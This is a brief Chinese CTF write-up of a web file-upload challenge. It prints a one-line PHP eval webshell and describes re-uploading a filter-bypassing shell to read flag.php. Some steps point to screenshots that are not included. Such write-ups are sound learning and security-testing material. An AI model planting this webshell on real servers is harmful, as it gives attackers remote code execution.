i春秋“百度杯”CTF比賽 九月場 web題 upload
題目描述:想怎么傳就怎么傳,就是這么任性。tips:flag在flag.php中
打開題目發現
於是想到通過上傳一句話木馬進入后台
上傳一句話木馬
<?php eval($_POST['ant']);?>
提示上傳成功,查看網頁源代碼提示
php文件上傳到u/antsword.php中。於是直接訪問發現代碼變成
eval($_POST['ant']); ?>
<?php明顯已經被過濾了,於是百度查找解決方法,發現有師傅提出
於是上傳新馬,成功掛馬。
通過馬訪問flag.php
得到flag
參考鏈接https://zhidao.baidu.com/question/502391825291536924.html